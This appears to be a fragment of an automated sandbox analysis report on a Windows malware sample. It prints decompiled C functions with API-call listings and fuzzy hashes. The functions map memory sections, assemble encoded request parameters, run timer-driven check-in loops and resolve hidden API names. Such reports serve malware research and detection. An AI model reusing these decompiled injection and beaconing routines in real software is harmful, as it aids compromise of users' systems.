                                                                                  						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                  					} else {
                                                                                  						memset(_v12, 0, _v24);
                                                                                  						 *_a4 = _v12;
                                                                                  					}
                                                                                  				}
                                                                                  				return _t47;
                                                                                  			}



















                                                                                  APIs
                                                                                  • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,033F416E), ref: 033F4FD0
                                                                                    • Part of subcall function 033F34D0: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,033F4FE5,00000002,00000000,?,?,00000000,?,?,033F4FE5,00000000), ref: 033F34FD
                                                                                  • memset.NTDLL ref: 033F4FF2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Section$CreateViewmemset
                                                                                  • String ID:
                                                                                  • API String ID: 2533685722-0
                                                                                  • Opcode ID: db69f8bf565353c54f1ead48bb6a05488d2e09908a1701edea36ea8a2536738b
                                                                                  • Instruction ID: 471b6c8802e3ecf784418acef47c0c416f398d1e46d52acd0fe810f084f6139e
                                                                                  • Opcode Fuzzy Hash: db69f8bf565353c54f1ead48bb6a05488d2e09908a1701edea36ea8a2536738b
                                                                                  • Instruction Fuzzy Hash: 4B211DB6D0020AAFDB11DFA9C8849EEFBB9FF48354F508469E605F7210D7359A448BA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E033F34D0(void** __esi, PVOID* _a4) {
                                                                                  				long _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				long _t13;
                                                                                  
                                                                                  				_v16 = 0;
                                                                                  				asm("stosd");
                                                                                  				_v8 = 0;
                                                                                  				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                                                  				if(_t13 < 0) {
                                                                                  					_push(_t13);
                                                                                  					return __esi[6]();
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}








                                                                                  APIs
                                                                                  • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,033F4FE5,00000002,00000000,?,?,00000000,?,?,033F4FE5,00000000), ref: 033F34FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: SectionView
                                                                                  • String ID:
                                                                                  • API String ID: 1323581903-0
                                                                                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                  • Instruction ID: 2c330e5c9bb2014c5c9543ea40237c8342b6e160683831b9cde9e557b6bb9406
                                                                                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                  • Instruction Fuzzy Hash: 62F012B590020DBFDB119FA5CC85CAFBBBDEB44264B504939B652E50A0D6319E088A60
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 77%
                                                                                  			E033F3CC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v20;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				long _t62;
                                                                                  				intOrPtr _t63;
                                                                                  				intOrPtr _t64;
                                                                                  				intOrPtr _t65;
                                                                                  				intOrPtr _t66;
                                                                                  				intOrPtr _t67;
                                                                                  				void* _t70;
                                                                                  				intOrPtr _t71;
                                                                                  				int _t74;
                                                                                  				void* _t75;
                                                                                  				intOrPtr _t76;
                                                                                  				int _t79;
                                                                                  				intOrPtr _t82;
                                                                                  				intOrPtr _t86;
                                                                                  				intOrPtr _t87;
                                                                                  				void* _t89;
                                                                                  				void* _t92;
                                                                                  				intOrPtr _t96;
                                                                                  				intOrPtr _t100;
                                                                                  				intOrPtr* _t102;
                                                                                  				void* _t108;
                                                                                  				intOrPtr _t113;
                                                                                  				signed int _t117;
                                                                                  				char** _t119;
                                                                                  				int _t122;
                                                                                  				signed int _t124;
                                                                                  				intOrPtr* _t125;
                                                                                  				intOrPtr* _t127;
                                                                                  				intOrPtr* _t129;
                                                                                  				intOrPtr* _t131;
                                                                                  				intOrPtr _t134;
                                                                                  				intOrPtr _t137;
                                                                                  				int _t140;
                                                                                  				intOrPtr _t141;
                                                                                  				int _t144;
                                                                                  				void* _t145;
                                                                                  				void* _t146;
                                                                                  				intOrPtr _t147;
                                                                                  				void* _t156;
                                                                                  				int _t157;
                                                                                  				void* _t158;
                                                                                  				void* _t159;
                                                                                  				void* _t160;
                                                                                  				intOrPtr _t161;
                                                                                  				void* _t163;
                                                                                  				long _t167;
                                                                                  				intOrPtr* _t168;
                                                                                  				intOrPtr* _t171;
                                                                                  				void* _t172;
                                                                                  				void* _t174;
                                                                                  				void* _t175;
                                                                                  				void* _t180;
                                                                                  
                                                                                  				_t156 = __edx;
                                                                                  				_t146 = __ecx;
                                                                                  				_t62 = __eax;
                                                                                  				_t145 = _a20;
                                                                                  				_a20 = 8;
                                                                                  				if(__eax == 0) {
                                                                                  					_t62 = GetTickCount();
                                                                                  				}
                                                                                  				_t63 =  *0x33fd018; // 0xd08e8e1d
                                                                                  				asm("bswap eax");
                                                                                  				_t64 =  *0x33fd014; // 0x5cb11ae7
                                                                                  				asm("bswap eax");
                                                                                  				_t65 =  *0x33fd010; // 0x15dc9586
                                                                                  				asm("bswap eax");
                                                                                  				_t66 =  *0x33fd00c; // 0x67522d90
                                                                                  				asm("bswap eax");
                                                                                  				_t67 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t3 = _t67 + 0x33fe622; // 0x74666f73
                                                                                  				_t157 = wsprintfA(_t145, _t3, 3, 0x3d144, _t66, _t65, _t64, _t63,  *0x33fd02c,  *0x33fd004, _t62);
                                                                                  				_t70 = E033F7C34();
                                                                                  				_t71 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t4 = _t71 + 0x33fe662; // 0x74707526
                                                                                  				_t74 = wsprintfA(_t157 + _t145, _t4, _t70);
                                                                                  				_t174 = _t172 + 0x38;
                                                                                  				_t158 = _t157 + _t74;
                                                                                  				if(_a8 != 0) {
                                                                                  					_t141 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t8 = _t141 + 0x33fe66d; // 0x732526
                                                                                  					_t144 = wsprintfA(_t158 + _t145, _t8, _a8);
                                                                                  					_t174 = _t174 + 0xc;
                                                                                  					_t158 = _t158 + _t144;
                                                                                  				}
                                                                                  				_t75 = E033F5728(_t146);
                                                                                  				_t76 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t10 = _t76 + 0x33fe38a; // 0x6d697426
                                                                                  				_t79 = wsprintfA(_t158 + _t145, _t10, _t75, _t156);
                                                                                  				_t147 = _a4;
                                                                                  				_t159 = _t158 + _t79;
                                                                                  				_t180 = _t147 -  *0x33fd2f0; // 0x0
                                                                                  				_t82 =  *0x33fd230; // 0x2b2a5a8
                                                                                  				_t15 = _t82 + 0x33fe33b; // 0x74636126
                                                                                  				_t160 = _t159 + wsprintfA(_t159 + _t145, _t15, 0 | _t180 == 0x00000000);
                                                                                  				_t86 =  *0x33fd278; // 0x5f295e0
                                                                                  				_t175 = _t174 + 0x1c;
                                                                                  				if(_t86 != 0) {
                                                                                  					_t137 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t17 = _t137 + 0x33fe8ea; // 0x3d736f26
                                                                                  					_t140 = wsprintfA(_t160 + _t145, _t17, _t86);
                                                                                  					_t175 = _t175 + 0xc;
                                                                                  					_t160 = _t160 + _t140;
                                                                                  				}
                                                                                  				_t87 =  *0x33fd288; // 0x5f295b0
                                                                                  				if(_t87 != 0) {
                                                                                  					_t134 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t19 = _t134 + 0x33fe685; // 0x73797326
                                                                                  					wsprintfA(_t160 + _t145, _t19, _t87);
                                                                                  					_t175 = _t175 + 0xc;
                                                                                  				}
                                                                                  				_t161 =  *0x33fd2dc; // 0x5f29630
                                                                                  				_t89 = E033F8A9B(0x33fd00a, _t161 + 4);
                                                                                  				_t167 = 0;
                                                                                  				_v12 = _t89;
                                                                                  				if(_t89 == 0) {
                                                                                  					L28:
                                                                                  					RtlFreeHeap( *0x33fd1f0, _t167, _t145); // executed
                                                                                  					return _a20;
                                                                                  				} else {
                                                                                  					_t92 = RtlAllocateHeap( *0x33fd1f0, 0, 0x800); // executed
                                                                                  					_a8 = _t92;
                                                                                  					if(_t92 == 0) {
                                                                                  						L27:
                                                                                  						HeapFree( *0x33fd1f0, _t167, _v12);
                                                                                  						goto L28;
                                                                                  					}
                                                                                  					E033F7C61(GetTickCount());
                                                                                  					_t96 =  *0x33fd2dc; // 0x5f29630
                                                                                  					__imp__(_t96 + 0x40);
                                                                                  					asm("lock xadd [eax], ecx");
                                                                                  					_t100 =  *0x33fd2dc; // 0x5f29630
                                                                                  					__imp__(_t100 + 0x40);
                                                                                  					_t102 =  *0x33fd2dc; // 0x5f29630
                                                                                  					_t163 = E033F140D(1, _t156, _t145,  *_t102);
                                                                                  					_v20 = _t163;
                                                                                  					asm("lock xadd [eax], ecx");
                                                                                  					if(_t163 == 0) {
                                                                                  						L26:
                                                                                  						RtlFreeHeap( *0x33fd1f0, _t167, _a8); // executed
                                                                                  						goto L27;
                                                                                  					}
                                                                                  					StrTrimA(_t163, 0x33fc2c4);
                                                                                  					_push(_t163);
                                                                                  					_t108 = E033F74AF();
                                                                                  					_v8 = _t108;
                                                                                  					if(_t108 == 0) {
                                                                                  						L25:
                                                                                  						RtlFreeHeap( *0x33fd1f0, _t167, _t163); // executed
                                                                                  						goto L26;
                                                                                  					}
                                                                                  					 *_t163 = 0;
                                                                                  					__imp__(_a8, _v12);
                                                                                  					_t168 = __imp__;
                                                                                  					 *_t168(_a8, _v8);
                                                                                  					 *_t168(_a8, _t163);
                                                                                  					_t113 = E033F745D(0, _a8);
                                                                                  					_a4 = _t113;
                                                                                  					if(_t113 == 0) {
                                                                                  						_a20 = 8;
                                                                                  						L23:
                                                                                  						E033F53A8();
                                                                                  						L24:
                                                                                  						RtlFreeHeap( *0x33fd1f0, 0, _v8); // executed
                                                                                  						_t167 = 0;
                                                                                  						goto L25;
                                                                                  					}
                                                                                  					_t117 = E033F6F41(_t145, 0xffffffffffffffff, _t163,  &_v16); // executed
                                                                                  					_a20 = _t117;
                                                                                  					if(_t117 == 0) {
                                                                                  						_t171 = _v16;
                                                                                  						_t124 = E033F492B(_t171, _a4, _a12, _a16); // executed
                                                                                  						_a20 = _t124;
                                                                                  						_t125 =  *((intOrPtr*)(_t171 + 8));
                                                                                  						 *((intOrPtr*)( *_t125 + 0x80))(_t125);
                                                                                  						_t127 =  *((intOrPtr*)(_t171 + 8));
                                                                                  						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                                                                  						_t129 =  *((intOrPtr*)(_t171 + 4));
                                                                                  						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                                                                  						_t131 =  *_t171;
                                                                                  						 *((intOrPtr*)( *_t131 + 8))(_t131);
                                                                                  						E033F4C31(_t171);
                                                                                  					}
                                                                                  					if(_a20 != 0x10d2) {
                                                                                  						L18:
                                                                                  						if(_a20 == 0) {
                                                                                  							_t119 = _a12;
                                                                                  							if(_t119 != 0) {
                                                                                  								_t164 =  *_t119;
                                                                                  								_t169 =  *_a16;
                                                                                  								wcstombs( *_t119,  *_t119,  *_a16);
                                                                                  								_t122 = E033F1000(_t164, _t164, _t169 >> 1);
                                                                                  								_t163 = _v20;
                                                                                  								 *_a16 = _t122;
                                                                                  							}
                                                                                  						}
                                                                                  						goto L21;
                                                                                  					} else {
                                                                                  						if(_a12 != 0) {
                                                                                  							L21:
                                                                                  							E033F4C31(_a4);
                                                                                  							if(_a20 == 0 || _a20 == 0x10d2) {
                                                                                  								goto L24;
                                                                                  							} else {
                                                                                  								goto L23;
                                                                                  							}
                                                                                  						}
                                                                                  						_a20 = _a20 & 0x00000000;
                                                                                  						goto L18;
                                                                                  					}
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 033F3CDB
                                                                                  • wsprintfA.USER32 ref: 033F3D28
                                                                                  • wsprintfA.USER32 ref: 033F3D45
                                                                                  • wsprintfA.USER32 ref: 033F3D65
                                                                                  • wsprintfA.USER32 ref: 033F3D83
                                                                                  • wsprintfA.USER32 ref: 033F3DA6
                                                                                  • wsprintfA.USER32 ref: 033F3DC7
                                                                                  • wsprintfA.USER32 ref: 033F3DE7
                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 033F3E18
                                                                                  • GetTickCount.KERNEL32 ref: 033F3E29
                                                                                  • RtlEnterCriticalSection.NTDLL(05F295F0), ref: 033F3E3D
                                                                                  • RtlLeaveCriticalSection.NTDLL(05F295F0), ref: 033F3E5B
                                                                                    • Part of subcall function 033F140D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F1438
                                                                                    • Part of subcall function 033F140D: lstrlen.KERNEL32(00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F1440
                                                                                    • Part of subcall function 033F140D: strcpy.NTDLL ref: 033F1457
                                                                                    • Part of subcall function 033F140D: lstrcat.KERNEL32(00000000,00000000), ref: 033F1462
                                                                                    • Part of subcall function 033F140D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,033F6C79,?,00000000,033F6C79,00000000,05F29630), ref: 033F147F
                                                                                  • StrTrimA.SHLWAPI(00000000,033FC2C4,?,05F29630), ref: 033F3E90
                                                                                    • Part of subcall function 033F74AF: lstrlen.KERNEL32(05F2887A,00000000,00000000,00000000,033F6CA0,00000000), ref: 033F74BF
                                                                                    • Part of subcall function 033F74AF: lstrlen.KERNEL32(?), ref: 033F74C7
                                                                                    • Part of subcall function 033F74AF: lstrcpy.KERNEL32(00000000,05F2887A), ref: 033F74DB
                                                                                    • Part of subcall function 033F74AF: lstrcat.KERNEL32(00000000,?), ref: 033F74E6
                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 033F3EB0
                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 033F3EC2
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 033F3EC8
                                                                                    • Part of subcall function 033F745D: lstrlen.KERNEL32(?,033FD2E0,73BB7FC0,00000000,033F534B,?,?,?,?,?,033F70B5,?), ref: 033F7466
                                                                                    • Part of subcall function 033F745D: mbstowcs.NTDLL ref: 033F748D
                                                                                    • Part of subcall function 033F745D: memset.NTDLL ref: 033F749F
                                                                                  • wcstombs.NTDLL ref: 033F3F5B
                                                                                    • Part of subcall function 033F492B: SysAllocString.OLEAUT32(00000000), ref: 033F496C
                                                                                    • Part of subcall function 033F492B: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 033F49EE
                                                                                    • Part of subcall function 033F492B: StrStrIW.SHLWAPI(00000000,006E0069), ref: 033F4A2D
                                                                                    • Part of subcall function 033F4C31: RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  • RtlFreeHeap.NTDLL(00000000,?,00000000), ref: 033F3F9C
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 033F3FAC
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,05F29630), ref: 033F3FBC
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 033F3FCC
                                                                                  • RtlFreeHeap.NTDLL(00000000,?), ref: 033F3FDA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                                                  • String ID:
                                                                                  • API String ID: 2871901346-0
                                                                                  • Opcode ID: 635463f98926005bd93527f3b6c88675e3f4a9635581c32cf8ddc88cef32124e
                                                                                  • Instruction ID: 0ebc7473512ed6babe0636e1b1a65acf787d3ba43b046f4048bc6f3dabcd91bd
                                                                                  • Opcode Fuzzy Hash: 635463f98926005bd93527f3b6c88675e3f4a9635581c32cf8ddc88cef32124e
                                                                                  • Instruction Fuzzy Hash: C3A1057590020AAFCB11EF68DCC8AAA7BBCFF48354F944125F909CB258DB35D951DBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 83%
                                                                                  			E033F37CA(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                  				struct %anon52 _v8;
                                                                                  				long _v12;
                                                                                  				char _v16;
                                                                                  				char _v20;
                                                                                  				signed int _v24;
                                                                                  				intOrPtr _v32;
                                                                                  				union _LARGE_INTEGER _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				void* _v44;
                                                                                  				void _v88;
                                                                                  				char _v92;
                                                                                  				struct %anon52 _t46;
                                                                                  				intOrPtr _t51;
                                                                                  				long _t53;
                                                                                  				void* _t54;
                                                                                  				struct %anon52 _t61;
                                                                                  				long _t65;
                                                                                  				signed int _t66;
                                                                                  				long _t68;
                                                                                  				void* _t69;
                                                                                  				void* _t71;
                                                                                  				signed int _t72;
                                                                                  				intOrPtr _t74;
                                                                                  				intOrPtr _t76;
                                                                                  				void** _t78;
                                                                                  				void* _t80;
                                                                                  
                                                                                  				_t74 = __edx;
                                                                                  				_v92 = 0;
                                                                                  				memset( &_v88, 0, 0x2c);
                                                                                  				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                  				_v44 = _t46;
                                                                                  				if(_t46 == 0) {
                                                                                  					_v8.LowPart = GetLastError();
                                                                                  				} else {
                                                                                  					_push(0xffffffff);
                                                                                  					_push(0xff676980);
                                                                                  					_push(0);
                                                                                  					_push( *0x33fd1f8);
                                                                                  					_v20 = 0;
                                                                                  					_v16 = 0;
                                                                                  					L033FAEE0();
                                                                                  					_v36.LowPart = _t46;
                                                                                  					_v32 = _t74;
                                                                                  					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                  					_t51 =  *0x33fd224; // 0x2d8
                                                                                  					_v40 = _t51;
                                                                                  					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                  					_v8.LowPart = _t53;
                                                                                  					if(_t53 == 0) {
                                                                                  						if(_a8 != 0) {
                                                                                  							L4:
                                                                                  							 *0x33fd204 = 5;
                                                                                  						} else {
                                                                                  							_t69 = E033F4C46(); // executed
                                                                                  							if(_t69 != 0) {
                                                                                  								goto L4;
                                                                                  							}
                                                                                  						}
                                                                                  						_v12 = 0;
                                                                                  						L6:
                                                                                  						L6:
                                                                                  						if(_v12 == 1 && ( *0x33fd218 & 0x00000001) == 0) {
                                                                                  							_v12 = 2;
                                                                                  						}
                                                                                  						_t72 = _v12;
                                                                                  						_t58 = _t72 << 4;
                                                                                  						_t76 = _t80 + (_t72 << 4) - 0x54;
                                                                                  						_t73 = _t72 + 1;
                                                                                  						_v24 = _t72 + 1;
                                                                                  						_t61 = E033F80F6( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
                                                                                  						_v8.LowPart = _t61;
                                                                                  						if(_t61 != 0) {
                                                                                  							goto L17;
                                                                                  						}
                                                                                  						_t66 = _v24;
                                                                                  						_t90 = _t66 - 3;
                                                                                  						_v12 = _t66;
                                                                                  						if(_t66 != 3) {
                                                                                  							goto L6;
                                                                                  						} else {
                                                                                  							_t68 = E033F53BE(_t73, _t90,  &_v92, _a4, _a8); // executed
                                                                                  							_v8.LowPart = _t68;
                                                                                  						}
                                                                                  						goto L12;
                                                                                  						L17:
                                                                                  						__eflags = _t61 - 0x10d2;
                                                                                  						if(_t61 != 0x10d2) {
                                                                                  							_push(0xffffffff);
                                                                                  							_push(0xff676980);
                                                                                  							_push(0);
                                                                                  							_push( *0x33fd1fc);
                                                                                  							goto L21;
                                                                                  						} else {
                                                                                  							__eflags =  *0x33fd200; // 0x1
                                                                                  							if(__eflags == 0) {
                                                                                  								goto L12;
                                                                                  							} else {
                                                                                  								_t61 = E033F53A8();
                                                                                  								_push(0xffffffff);
                                                                                  								_push(0xdc3cba00);
                                                                                  								_push(0);
                                                                                  								_push( *0x33fd200);
                                                                                  								L21:
                                                                                  								L033FAEE0();
                                                                                  								_v36.LowPart = _t61;
                                                                                  								_v32 = _t76;
                                                                                  								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                  								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                  								__eflags = _t65;
                                                                                  								_v8.LowPart = _t65;
                                                                                  								if(_t65 == 0) {
                                                                                  									goto L6;
                                                                                  								} else {
                                                                                  									goto L12;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						L25:
                                                                                  					}
                                                                                  					L12:
                                                                                  					_t78 =  &_v92;
                                                                                  					_t71 = 3;
                                                                                  					do {
                                                                                  						_t54 =  *_t78;
                                                                                  						if(_t54 != 0) {
                                                                                  							RtlFreeHeap( *0x33fd1f0, 0, _t54); // executed
                                                                                  						}
                                                                                  						_t78 =  &(_t78[4]);
                                                                                  						_t71 = _t71 - 1;
                                                                                  					} while (_t71 != 0);
                                                                                  					CloseHandle(_v44);
                                                                                  				}
                                                                                  				return _v8;
                                                                                  				goto L25;
                                                                                  			}






























                                                                                  APIs
                                                                                  • memset.NTDLL ref: 033F37DF
                                                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 033F37EB
                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 033F3810
                                                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 033F382C
                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 033F3845
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000), ref: 033F38DA
                                                                                  • CloseHandle.KERNEL32(?), ref: 033F38E9
                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 033F3923
                                                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,033F7A05), ref: 033F3939
                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 033F3944
                                                                                    • Part of subcall function 033F4C46: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05F29328,00000000,?,73BCF710,00000000,73BCF730), ref: 033F4C95
                                                                                    • Part of subcall function 033F4C46: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05F29360,?,00000000,30314549,00000014,004F0053,05F2931C), ref: 033F4D32
                                                                                    • Part of subcall function 033F4C46: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,033F3858), ref: 033F4D44
                                                                                  • GetLastError.KERNEL32 ref: 033F3956
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                  • String ID:
                                                                                  • API String ID: 3521023985-0
                                                                                  • Opcode ID: aa7816d6f8f033982ee5d8bb7f23e54127f3c86ecc9b5cf0c022f76186e3f887
                                                                                  • Instruction ID: 268e539b33655c6fc3e4becd72204f1985753233c85ba4b531b46b3f0cec6356
                                                                                  • Opcode Fuzzy Hash: aa7816d6f8f033982ee5d8bb7f23e54127f3c86ecc9b5cf0c022f76186e3f887
                                                                                  • Instruction Fuzzy Hash: B6515A75801229BFDF10EF95DCC4AEEBFBCEF09360F944116E610A6198D7788A44CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 61%
                                                                                  			E033F7E3F(void* __eax, void* __ecx) {
                                                                                  				long _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v28;
                                                                                  				long _v32;
                                                                                  				void _v104;
                                                                                  				char _v108;
                                                                                  				long _t39;
                                                                                  				intOrPtr _t42;
                                                                                  				intOrPtr _t49;
                                                                                  				void* _t51;
                                                                                  				intOrPtr _t52;
                                                                                  				void* _t60;
                                                                                  				intOrPtr* _t65;
                                                                                  				intOrPtr _t69;
                                                                                  				intOrPtr* _t71;
                                                                                  				intOrPtr* _t74;
                                                                                  
                                                                                  				_t1 = __eax + 0x14; // 0x74183966
                                                                                  				_t69 =  *_t1;
                                                                                  				_t39 = E033F40AF(__ecx,  *(_t69 + 0xc),  &_v12,  &_v16); // executed
                                                                                  				_v8 = _t39;
                                                                                  				if(_t39 != 0) {
                                                                                  					L12:
                                                                                  					return _v8;
                                                                                  				}
                                                                                  				memcpy(_v12,  *(_t69 + 8),  *(_t69 + 0xc));
                                                                                  				_t42 = _v12(_v12);
                                                                                  				_v8 = _t42;
                                                                                  				if(_t42 == 0 && ( *0x33fd218 & 0x00000001) != 0) {
                                                                                  					_v32 = 0;
                                                                                  					asm("stosd");
                                                                                  					asm("stosd");
                                                                                  					asm("stosd");
                                                                                  					_v108 = 0;
                                                                                  					memset( &_v104, 0, 0x40);
                                                                                  					_t49 =  *0x33fd230; // 0x2b2a5a8
                                                                                  					_t18 = _t49 + 0x33fe55b; // 0x73797325
                                                                                  					_t51 = E033FA590(_t18);
                                                                                  					_v12 = _t51;
                                                                                  					if(_t51 == 0) {
                                                                                  						_v8 = 8;
                                                                                  					} else {
                                                                                  						_t52 =  *0x33fd230; // 0x2b2a5a8
                                                                                  						_t20 = _t52 + 0x33fe73d; // 0x5f28ce5
                                                                                  						_t21 = _t52 + 0x33fe0af; // 0x4e52454b
                                                                                  						_t65 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                                                                                  						if(_t65 == 0) {
                                                                                  							_v8 = 0x7f;
                                                                                  						} else {
                                                                                  							_t71 = __imp__;
                                                                                  							_v108 = 0x44;
                                                                                  							 *_t71(0);
                                                                                  							_t60 =  *_t65(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32); // executed
                                                                                  							 *_t71(1);
                                                                                  							if(_t60 == 0) {
                                                                                  								_v8 = GetLastError();
                                                                                  							} else {
                                                                                  								FindCloseChangeNotification(_v28); // executed
                                                                                  								CloseHandle(_v32);
                                                                                  							}
                                                                                  						}
                                                                                  						HeapFree( *0x33fd1f0, 0, _v12);
                                                                                  					}
                                                                                  				}
                                                                                  				_t74 = _v16;
                                                                                  				 *((intOrPtr*)(_t74 + 0x18))( *((intOrPtr*)(_t74 + 0x1c))( *_t74));
                                                                                  				E033F4C31(_t74);
                                                                                  				goto L12;
                                                                                  			}





















                                                                                  APIs
                                                                                    • Part of subcall function 033F40AF: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,033F7E5B,?,?,?,?,00000000,00000000), ref: 033F40D4
                                                                                    • Part of subcall function 033F40AF: GetProcAddress.KERNEL32(00000000,7243775A), ref: 033F40F6
                                                                                    • Part of subcall function 033F40AF: GetProcAddress.KERNEL32(00000000,614D775A), ref: 033F410C
                                                                                    • Part of subcall function 033F40AF: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 033F4122
                                                                                    • Part of subcall function 033F40AF: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 033F4138
                                                                                    • Part of subcall function 033F40AF: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 033F414E
                                                                                  • memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 033F7E71
                                                                                  • memset.NTDLL ref: 033F7EAC
                                                                                    • Part of subcall function 033FA590: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,033F3592,73797325), ref: 033FA5A1
